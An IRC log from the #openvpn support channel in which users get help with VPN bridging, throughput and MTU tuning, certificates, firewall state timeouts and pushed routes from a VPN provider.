#openvpn 04:07 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 04:13 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 04:21 -!- sqwerty [~sqwerty@rubberductions.plus.com] has joined #openvpn 04:21 -!- sqwerty [~sqwerty@rubberductions.plus.com] has quit [Changing host] 04:21 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 04:50 -!- catsup [~d@64.111.123.163] has joined #openvpn 05:09 -!- brute11k [~brute@89.249.230.53] has joined #openvpn 05:28 -!- joshie [~josh@75-150-76-129-NewEngland.hfc.comcastbusiness.net] has quit [Quit: No Ping reply in 180 seconds.] 05:29 -!- joshie [~josh@joshie.net] has joined #openvpn 06:27 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 06:29 -!- wykydtro- [tassadar@persephone.darkness-reigns.net] has joined #openvpn 06:31 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 06:31 -!- feth_ [foobar@ile-flottante.tuttu.info] has joined #openvpn 06:31 -!- cyberspace- [20253@ninthfloor.org] has quit [Disconnected by services] 06:31 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 06:33 -!- raidzz [~raidz@raidz.im] has joined #openvpn 06:33 -!- raidzz is now known as raidz 06:33 -!- raidz [~raidz@raidz.im] has quit [Changing host] 06:33 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 06:33 -!- mode/#openvpn [+o raidz] by ChanServ 06:35 -!- Netsplit *.net <-> *.split quits: kloeri, @raidz_away, feth, wykydtron, JPeterson, paccer 06:39 -!- p3rror [~mezgani@41.249.14.4] has joined #openvpn 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:49 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 06:52 -!- kloeri_ is now known as kloeri 06:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:55 < Visitorer> okay so I've set up a server on a tap interface 06:55 < Visitorer> on Mac OS 06:55 < Visitorer> my friend and I can both see each other's iTunes libraries 06:55 < Visitorer> so we're somehow connected 06:55 < Visitorer> however, we can't see each other on Civilization V 06:56 < Visitorer> I'm thinking that it may have something to do with the priority of the network interface if there is such a thing on Mac 06:56 < Visitorer> or that Civ V can't broadcast to the LAN 06:56 < Visitorer> for some reason 06:56 < Visitorer> I followed the config here, which apparently works http://forums.civfanatics.com/showthread.php?t=482925 06:57 < Visitorer> except that I have server-bridge 192.168.50.4 255.255.255.0 192.168.50.50 192.168.50.100 instead 07:01 < neilhwatson> Can each of you ping the other's computer? 07:26 < Visitorer> actually, no 07:28 -!- feth_ is now known as feth 07:30 -!- ade_b [Ade@nat/redhat/x-ivcbwnduhfydwbdr] has joined #openvpn 07:30 -!- ade_b [Ade@nat/redhat/x-ivcbwnduhfydwbdr] has quit [Changing host] 07:30 -!- ade_b [Ade@redhat/adeb] has joined #openvpn 07:34 < neilhwatson> Then your tunnel might not be functioning, or you have a firewal issue. 07:42 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has joined #openvpn 07:43 < simpelsimon> hey, im trying to setup openvpn on ubuntu12.10 07:44 < simpelsimon> everything works until /sbin/ifconfig tun14 10.1.0.38 pointotpoint 10.1.0.37 mt 1500 07:44 < simpelsimon> openvpn is blocking 07:44 < simpelsimon> any idea? 07:53 < Visitorer> well I know that my router isn't the problem, as I had originally forgotten to forward the port so my friend couldn't even connect originally 07:54 < Visitorer> the firewall on my computer is turned off... 07:54 < Visitorer> I don't understand why we can share iTunes libraries then..? 08:02 -!- alex88 [~alex88@unaffiliated/alex88] has left #openvpn ["Leaving..."] 08:14 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 08:31 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 08:37 -!- paccer [uid4847@gateway/web/irccloud.com/x-alqdhrhtspqzjhoz] has joined #openvpn 08:44 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:50 -!- dazo is now known as dazo_afk 09:05 -!- dazo_afk is now known as dazo 09:22 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has quit [Quit: Client has a boner *rimshot* Get it?] 09:26 -!- Matir [~matir@ubuntu/member/matir] has quit [Ping timeout: 248 seconds] 09:26 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 09:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:46 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 10:05 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 10:05 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 10:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 10:09 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 245 seconds] 10:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:22 -!- ade_b [Ade@redhat/adeb] has quit [Ping timeout: 240 seconds] 10:47 -!- AsadH is now known as zz_AsadH 10:48 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Ping timeout: 264 seconds] 10:48 -!- neilhwatson [~neilhwats@72.138.34.70] has joined #openvpn 10:57 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has quit [Quit: Leaving.] 11:04 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 11:07 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 11:07 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:10 -!- mode/#openvpn [+o krzee] by ChanServ 11:13 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 11:18 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 11:20 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 11:34 -!- dazo is now known as dazo_afk 11:35 -!- kevinsky [~kevin@senna.rosendaal.net] has joined #openvpn 11:36 -!- JSharpe [~JSharpe@31.3.253.10] has joined #openvpn 11:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:00 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has joined #openvpn 12:03 -!- karlson [~nranchev@75.98.195.190] has joined #openvpn 12:05 < karlson> Hello 12:06 < karlson> I have to servers connected over openvpn but I am getting a really low bandwidth over vpn 12:06 < karlson> 10x what I am getting if the machines are communicating directly 12:08 < karlson> "two* servers" 12:08 < karlson> could anyone suggest things I could try? 12:09 < dioz> turn lzo off 12:09 < dioz> do it over udp not tcp 12:09 < dioz> use something like gre instead of openvpn 12:09 < rob0> I don't suppose either one is Windows, is it? 12:10 < karlson> udp is 10x slower tcp is 30x slower... :( 12:10 < karlson> nope 12:10 < karlson> both linux 12:10 < rob0> okay, ruled out my idea. 12:10 < karlson> I will try lzo off right now 12:11 <@krzee> !gigabit 12:11 <@vpnHelper> "gigabit" is https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux for JJK's writeup on getting the most out of openvpn over gigabit 12:11 < karlson> the openvpns processes on either server is not taking more than 10-15% of cpu 12:15 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 12:15 < karlson> lzo changes had no effect :( 12:16 < karlson> (at least not significant) 12:16 -!- master_o1_master [~master_of@p4FF24C7A.dip.t-dialin.net] has joined #openvpn 12:19 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 12:27 < karlson> increasing the mtus substantially seems to be helping a lot 12:39 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 12:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 12:41 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 12:43 < neilhwatson> Some ISP's throttle encrypted traffic. 12:43 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:43 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:43 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:43 -!- mode/#openvpn [+o krzee] by ChanServ 12:43 < karlson> neilhwatson: that's not the case in my situation 12:46 < karlson> should I expect to get the same bandwidth over openvpn as I do directly between the two servers 12:47 < neilhwatson> There are some mtu settings including test and discovery. 12:47 < karlson> right now it's much better than it was with the default of mtu=1500 but still 3x slower than not using the vpn 12:47 < karlson> you mean mtu-test? 12:47 < karlson> I ran that but it didn't suggest any changes :( 12:48 <@krzee> mtu test may stop after testing below default 12:48 <@krzee> if your benefits are from bigger mtu, that'ld make sense 12:48 <@krzee> but im not 100% on how it works 12:56 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 264 seconds] 13:00 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 13:01 < TommehM> Does anyone know how to combine certificates with the client.conf? I have seen it done before and attempted to replicate it but I just cant seem to get it right. 13:02 <@krzee> !inline 13:02 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 13:02 < TommehM> Thanks. 13:02 <@krzee> yw 13:15 -!- chilicuil [~chilicuil@ubuntu/member/chilicuil] has joined #openvpn 13:15 -!- chilicuil [~chilicuil@ubuntu/member/chilicuil] has left #openvpn [] 13:16 -!- NeWGame [irc2gowebc@84.126.149.110.dyn.user.ono.com] has joined #openvpn 13:16 < NeWGame> hi 13:21 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 13:26 < NeWGame> hi 13:46 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 13:47 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 13:59 -!- karlson [~nranchev@75.98.195.190] has left #openvpn [] 14:03 -!- brute11k [~brute@89.249.230.53] has quit [Ping timeout: 244 seconds] 14:05 -!- UserUnk201302 [~UserUnk@wsip-68-109-228-234.ri.ri.cox.net] has joined #openvpn 14:07 < UserUnk201302> I am moving my vpn from one machine to another. Can I just copy the easy-rsa folder and will it work on the other machine? 14:07 -!- brute11k [~brute@89.249.235.13] has joined #openvpn 14:11 < rob0> You should keep your PKI on a different machine anyway. It should not be maintained on the server, and ideally, not even accessible online. 14:12 < UserUnk201302> so, if i keep it on my laptop, i can create keys and just copy to the server and clients? 14:17 -!- Devastator- [~devas@177.18.198.56] has joined #openvpn 14:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds] 14:18 -!- Kovica [~kovica@77.38.49.83] has joined #openvpn 14:20 < Kovica> I have a very strange problem using openvpn. I have a server (openvpn v2.2.1 on Ubuntu 12.04) and I can connect to it and I can also access servers in my internal network. But sometimes it happens that I cannot access a server that I was able 10 minutes ago. 14:20 < Kovica> It gets even stranger. In on terminal I have a ssh session opened to the server, but in another terminal I cannot ping it anymore. 14:21 < Kovica> On the server I'm running Ubuntu 11.10 14:21 <@krzee> ssh prolly didnt time out yet 14:21 < Kovica> how can I go about to solving this mistery? 14:22 < Kovica> ohh.. on the VPN server I use iptables to restrict certain VPN client access to certain internal servers 14:23 < Kovica> when I run tcpdump on the VPN server and ping internal server from a VPN client, I see ICMP requests comming to VPN server, but no responses 14:24 < Kovica> from the internal server 14:26 < UserUnk201302> rob0, thanks 14:26 -!- UserUnk201302 [~UserUnk@wsip-68-109-228-234.ri.ri.cox.net] has quit [Quit: Leaving] 14:26 <@krzee> heh so you firewalled it off? 14:27 < Kovica> krzee, nope since I didn't chane iptables in ages... 14:27 < Kovica> krzee, and this happened to me half an houg ago.. 14:27 < Kovica> it's voodo or something.. I don't know 14:27 <@krzee> dont look at it from a "what did i change" angle 14:28 <@krzee> look at it from a "what changed?" angle 14:28 <@krzee> figure out what changed, dont assume nothing did 14:28 <@krzee> cause obviously, something did 14:28 < Kovica> krzee, and one of my colleagues is saying to me now, that he can access the server.. 14:29 <@krzee> then you prolly lost the connection, like i said at first 14:29 <@krzee> ssh prolly didnt time out yet 14:29 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 14:30 < Kovica> ssh prolly? 14:30 <@krzee> no, you got disconnected 14:31 <@krzee> you prolly cant ping the vpn server over the vpn when it happens either 14:31 <@krzee> did you go give a user your certificates instead of making new ones? 14:31 < Kovica> krzee, nope 14:31 < Kovica> krzee, every user has it's own settings 14:32 <@krzee> certs != settings, but ok 14:32 < Kovica> and certs 14:32 < Kovica> and private keys 14:32 <@krzee> when it happens, start pinging the server over the vpn 14:32 <@krzee> i bet you arent on the vpn at all when it happens 14:33 < Kovica> I am, because at the time it happened I was on the VPN server running tcpdump and on my computer running ping to the internal server 14:33 < Kovica> btw: I can ping the internal server again 14:33 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has quit [Remote host closed the connection] 14:34 < Kovica> and I didn't even reconnect my VPN client 14:36 -!- Orbi [~opera@109.129.0.214] has joined #openvpn 14:37 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has quit [Remote host closed the connection] 14:45 < Kovica> strange 14:45 < Kovica> at least to me 14:47 <@krzee> its either a drop in your connection or a firewall 14:47 <@krzee> thats all i can tell ya 14:47 -!- voidnecron [~voidnecro@unaffiliated/necron] has quit [] 14:47 <@krzee> and your vpn client likely reconnects itself 14:48 <@krzee> and if somehow your certs are in use 2x, then your clients will battle eachother for the connection 14:48 < Kovica> krzee, ok. thanks. :) But would you agree that if I can connect to the server once, I will be able to connect the second time. So firewall cannot be, right? 14:49 < pekster> Some filewall rulesets do rate limiting in a weird enough way that could cause problems, so it really depends on the ruleset you're using 14:49 <@krzee> i know too little about your setup to tell you that 14:49 <@krzee> ya what he said ^ 14:49 < pekster> Never under-estimate the ability of a badly configured firewall to screw things up ;) 14:49 < Kovica> :) 14:50 <@krzee> udp keep-state has caused problems for some in the past as well 14:50 < Kovica> I'm only doing this kind of administration for couple of months 14:51 < Kovica> we are using udp, yes 14:51 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 14:52 <@krzee> udp is good, udp keep-state attempts are not 14:52 -!- p3rror [~mezgani@41.249.14.4] has quit [Read error: Operation timed out] 14:52 < pekster> krzee: keep state suffix in ipf? 14:54 < pekster> Since udp is stateless, that should just show up a a new connection and be allowed to pass if the keepalives get dropped long enough to expire the "stateful" entry 14:55 < Kovica> bye keep-state you mean something like: iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 14:55 <@krzee> so not enough keepalive, and not enough traffic = keep-state on non-stateful protocol fubars you 14:55 < pekster> In netfilter, yes. The Linux kernel times out even established UDP streams in 3 minutes (by defalut, although that's configurable) 14:57 -!- p3rror [~mezgani@41.249.35.188] has joined #openvpn 14:57 < pekster> krzee: Ah, ipf has a "keep state" suffix for rules, f.eg: pass in quick proto udp from any to $our_ip port = 1194 keep state 14:57 < pekster> Apaparently you meant something else 14:58 <@krzee> ipf as in freebsd ipf? 14:58 <@krzee> i havnt seen that in years 14:58 <@krzee> like since the 90s 14:58 <@krzee> you really use ipf? 14:58 <@krzee> maybe you mean pf or ipfw? :D 15:03 < pekster> ipf. http://www.freebsd.org/cgi/man.cgi?query=ipf&sektion=5&apropos=0&manpath=FreeBSD+9.1-RELEASE 15:03 <@vpnHelper> Title: ipf(5) (at www.freebsd.org) 15:03 <@krzee> sweet! 15:03 <@krzee> keep it alive bro! 15:04 < pekster> That was on a box I inherited config for, so don't change what's working, especially when you see all the layers of NAT involved ;) 15:04 <@krzee> ipf is cool anyways 15:04 <@krzee> easier to change to pf as well 15:04 <@krzee> if it were ipfw it would likely be very different 15:04 <@krzee> ill bbl, just got off work 15:04 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds] 15:05 <@krzee> time to go smoke my favorite plant and get ready to DJ at a bar tonight (for fun not work) 15:05 < pekster> Yea, macro support is nice in pf. Plus the BSD's had hfsc before it was cool enough for Linux ;) 15:06 < pekster> Somewhere there's a really good writeup on the benefits of hfsc under Linux's tc verses using sfq 15:07 -!- sh_t [~sht@176.222.238.158] has quit [Read error: No route to host] 15:07 < Kovica> http://linux-ip.net/articles/hfsc.en/ maybe ? 15:07 <@vpnHelper> Title: HFSC Scheduling with Linux (at linux-ip.net) 15:07 -!- sh_t [~sht@176.222.238.158] has joined #openvpn 15:08 -!- mattock is now known as mattock_afk 15:10 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 15:12 -!- MadTBone [~MadTBone@160.39.238.196] has joined #openvpn 15:12 -!- MadTBone [~MadTBone@160.39.238.196] has quit [Client Quit] 15:16 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 15:16 < pekster> Oh, it was comparing hfsc to tbf in terms of how they handle drops. The commented section is a pretty good writeup. The code might be a starting point, but it's not quite what I would use: https://gist.github.com/lsowen/4144606 15:16 <@vpnHelper> Title: HFSC - linux traffic shapings best kept secret (at gist.github.com) 15:17 < pekster> Either tbf or hfsc is easier and more sane to manage than CBQ, which is just needlessly complicated 15:29 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 248 seconds] 15:33 -!- mezgani_ [~mezgani@41.249.81.140] has joined #openvpn 15:34 -!- p3rror [~mezgani@41.249.35.188] has quit [Ping timeout: 245 seconds] 15:37 < Kovica> have fun guys.. Have to go to bed. Good night.... 15:37 -!- Kovica [~kovica@77.38.49.83] has quit [Quit: Leaving] 15:52 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 15:52 -!- mode/#openvpn [+v s7r] by ChanServ 16:17 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:26 -!- JSharpe [~JSharpe@31.3.253.10] has quit [Quit: Leaving] 16:27 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Read error: Operation timed out] 16:28 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 16:40 -!- unicorn_ [~unicorn@188.126.74.248] has joined #openvpn 16:40 < unicorn_> hi 16:40 < unicorn_> I have a problem with dns leaking when using openvpn 16:41 -!- unicorn_ is now known as randomA 16:41 < randomA> hey 16:41 <@ecrist> it's for horses 16:45 < randomA> how do i prevent my dns from leaking? 16:45 < randomA> someone said to use commodo's servers...should I do that? 16:45 < EugeneKay> Duct tape. 16:46 < randomA> ok...so i can't? 16:48 < randomA> as long as my own DNS doesn't show it's ok? 16:49 -!- randomA [~unicorn@188.126.74.248] has quit [Quit: Lost terminal] 16:49 < rob0> heh 16:49 < rob0> I was just thinking about trying to answer, saved by the /quit 16:53 -!- Orbi [~opera@109.129.0.214] has left #openvpn [] 16:54 -!- mezgani_ [~mezgani@41.249.81.140] has quit [Read error: Operation timed out] 16:56 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has joined #openvpn 16:58 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has left #openvpn [] 17:09 -!- mezgani_ [~mezgani@41.140.224.153] has joined #openvpn 17:12 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has joined #openvpn 17:14 -!- NeWGame [irc2gowebc@84.126.149.110.dyn.user.ono.com] has quit [Quit: irc2go] 17:15 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has joined #openvpn 17:16 < Kendall> would there be any issue running both OpenVPN and IPSEC vpn on the same server? I wouldn't assume there is, but VPN isn't my forte 17:20 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 246 seconds] 17:30 < pppingme> Kendall there's no conflicting ports or protocols between OpenVPN and IPSEC, so careful planning of your IP structure and all should go well. 17:34 < Kendall> ok, thanks. One other question, are there downsides or limitations to how many connections you can make using a single certificate, when --duplicate-cn is enabled ? 17:36 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 17:36 < pppingme> Kendall why would you want to do that? What happens if you have a laptop or something go rogue, then you have to kill EVERYONES certificate and re-issue instead of just revoking the one. 17:37 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 17:38 < pppingme> plus you have no idea who is actually connecting, you lose the ability to do ccd if you need to and a lot of other dis-advantages 17:38 < Kendall> it would be a single certificate used to connect an Amazon Virtual Private Cloud. The guy setting it up is telling me that each EC2 instance would need it's own openvpn cert, which since we're trying to accomplish auto scaling would be a huge PITA 17:39 < Kendall> so I thought maybe we could do one certificate just for EC2 VPC and use duplicate-cn 17:39 -!- mezgani_ [~mezgani@41.140.224.153] has quit [Quit: Leaving] 17:40 < Kendall> I would run a separate openVPN server so that only that one certificate is allowed to duplicate, none of the remote workers would have such capability 17:40 < pppingme> Kendall if the vpn is also used for general use, then I'd run two instances of openvpn, one for general use, and one for your amazon stuff, since, assuming, you have full control of the amazon stuff, not quite like a laptop that can grow legs. 17:41 -!- speed_racer8 [~speed_rac@98.196.168.201] has joined #openvpn 17:41 < pppingme> hah, same though.. 17:41 < Kendall> right, that's what I'm thinking. It's either that, or I configure and maintain an IPSEC gateway as well, which I have no experience with 17:41 < Kendall> and really is just one more thing to maintain 17:43 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn 17:44 -!- p3rror [~mezgani@41.140.224.153] has joined #openvpn 17:44 < pppingme> a static ipsec setup is probably a tad more stable than an openvpn setup 17:47 < rob0> Shared certificates are pretty much always a bad idea. What little you gain on the initial setup will be more than lost in the future, count on it. 17:54 < Kendall> alright, I'll do some more research. Thanks guys, have a good night! 17:54 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has quit [Quit: Leaving.] 17:58 < MeanderingCode> anyone here using ubuntu or variant? 17:59 < MeanderingCode> as of yesterday i can't connect to my openvpn provider, while others say they can, though i can ping the server: 17:59 < MeanderingCode> i'm getting tls handshake timeouts, and yesterday libgnutls26 was updated 17:59 < MeanderingCode> the timing of which makes me think that somehow that lib update has broken my openvpn client functionality 18:00 < MeanderingCode> but of course no one in #ubuntu who is active in the channel has anything to say 18:03 < pekster> MeanderingCode: OpenVPN uses openssl, not gnutls 18:03 < MeanderingCode> hmmm, someone else on the same repos got the same update and they can still connect 18:03 < MeanderingCode> pekster: oh, there's more buckshot in that theory 18:03 < MeanderingCode> any other leads? 18:04 < pekster> Sounds like your traffic simply isn't making it to the remote endpoint. If you tcpdump the port used, do you see any return traffic? (Hopefully you see the outbound traffic, otherwise your problem is more local) 18:04 < MeanderingCode> getting no ack, it seems, when trying to start the tls handshake 18:04 < pekster> Right, that's the usual symptom of "your data isn't getting to the peer" 18:05 < MeanderingCode> pekster: pings come back...i will try tcpdump and run it again 18:05 < pekster> A ping to your peer? That means it's reachable and routable, but that doesn't necessarily mean the UDP traffic (or tcp, if used with proto tcp-client) is making it there and back 18:14 < MeanderingCode> pekster: yeah, running the tcpdump on the router, itself, shows no responses from the server 18:14 < MeanderingCode> thx for the tip 18:15 < pekster> So you're left with the potential for your outbound data to never reach the server, or the server's reply never to reach you; tcpdump would shows you return packets even if you firewalled them, so it's not your firewall (assuming you saw the outbound.) 18:16 < pekster> Could be an ISP or upstream filtering issue, or a problem with the reply somewhere 18:16 < pekster> You can try tracing that port with increasing TTL packets, starting with a TTL of 2 and see how far you get 18:17 < pekster> Compare that to a traceroute for your known-working ping 18:17 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:18 < MeanderingCode> pekster: thanks for the help...false alarm, it turns out: the server port i usually use isn't responding, but another port is 18:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 18:39 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 18:39 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 252 seconds] 18:41 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 244 seconds] 18:43 -!- corretico [~luis@190.211.93.38] has joined #openvpn 18:44 < DougEFresh> hey 18:44 < DougEFresh> ecrist: you around 18:46 < DougEFresh> someone asked me wy no centos 6 openvpn AS 18:46 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 18:47 -!- MeanderingCode_ [~Meanderin@71-213-164-137.albq.qwest.net] has joined #openvpn 18:47 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has quit [Ping timeout: 240 seconds] 19:05 -!- MeanderingCode [~Meanderin@71-213-172-90.albq.qwest.net] has joined #openvpn 19:05 -!- MeanderingCode_ [~Meanderin@71-213-164-137.albq.qwest.net] has quit [Ping timeout: 255 seconds] 19:21 -!- MeanderingCode [~Meanderin@71-213-172-90.albq.qwest.net] has quit [Remote host closed the connection] 19:28 -!- raidz is now known as raidz_away 19:32 -!- p3rror [~mezgani@41.140.224.153] has quit [Ping timeout: 245 seconds] 19:37 -!- Devastator- [~devas@177.18.198.56] has quit [Changing host] 19:37 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 19:37 -!- Devastator- is now known as Devastator 19:55 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host] 19:55 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 20:03 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 248 seconds] 20:12 -!- Rassmasta [~Rassmasta@CPE0023bee4930d-CM0023bee4930a.cpe.net.cable.rogers.com] has joined #openvpn 20:12 < Rassmasta> !welcome 20:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 20:12 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 20:12 < Rassmasta> !howto 20:12 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 20:38 -!- Rassmasta [~Rassmasta@CPE0023bee4930d-CM0023bee4930a.cpe.net.cable.rogers.com] has quit [Quit: Leaving] 21:02 -!- C-S-B [~C-S-B@host86-171-238-234.range86-171.btcentralplus.com] has joined #openvpn 21:02 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 21:05 -!- NeoLobster [~NeoLobste@snugglenets.com] has joined #openvpn 21:09 < NeoLobster> Hi. I have an OpenVPN client connection set up on a workstation that's behind NAT. I use port forwarding on the router for incoming connections (on port 80 and 22). When I start the OpenVPN connection, I'm no longer able to access the inbound ports from outside of my network. Is there a way to configure OpenVPN to ignore those connections? 21:11 < NeoLobster> It seems as though the connection is coming in from the real network interface, but the response is being sent out through the VPN 21:12 < pekster> If you're using/pushing --redirect-gateway this is the expected behaviour. The solution is to stop using it if you do not want it 21:14 < NeoLobster> Is that a server-side configuration? I'm not sure if that's what's going on here, I see nothing about redirect-gateway in the config I'm using 21:15 < pekster> Yup, that can be pushed from the server. It'll show up in the client logs as a 'PUSH_REPLY' log line 21:15 < NeoLobster> Oh, yeah... I see that. 21:15 < NeoLobster> Thu Feb 28 20:54:19 2013 PUSH: Received control message: 'PUSH_REPLY,dhcp-option DNS 8.8.8.8,redirect-gateway,route 10.10.0.1,topology net30,ping 20,ping-restart 240,ifconfig 10.10.0.170 10.10.0.169' 21:16 < NeoLobster> Now, the problem is.. I don't have access to the server-side configuration. It's a paid VPN service. I basically have two ports that need to be visible to the outside world on my machine, but all other traffic needs to go through the VPN. Is there a way I can configure that from the client side? 21:16 < pekster> You can make a server-side exception by way of a ccd (or client-connect script) and use of push-reset. Optionally the client use route-nopull which doesn't apply any pushed routes 21:33 < rob0> ewww, net30 21:33 < rob0> and no def1 21:34 -!- Rassmasta [~Rassmasta@99.228.239.126] has joined #openvpn 21:38 < pekster> If that's a hosted/provider setup, bad providers are VPNs are a dime a dozen. I give it 6 months before the content industry catches on and starts using the legal system to tear the worst offenders down in the 21:38 < pekster> in the "web anonymonity" department 21:39 < pekster> I should do a write-up on how VPNs are not anonymous. Maybe I can get downvoted to no end on reddit with it :) 21:52 < EugeneKay> Ah, reddit. 21:52 < EugeneKay> Source of endless boobs. 22:25 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn 22:26 < mongoman> Hi, i have a problem using 2 openvpn client connections simultaneously. 22:27 < mongoman> Is there a white paper, or a common practice on achieving this? 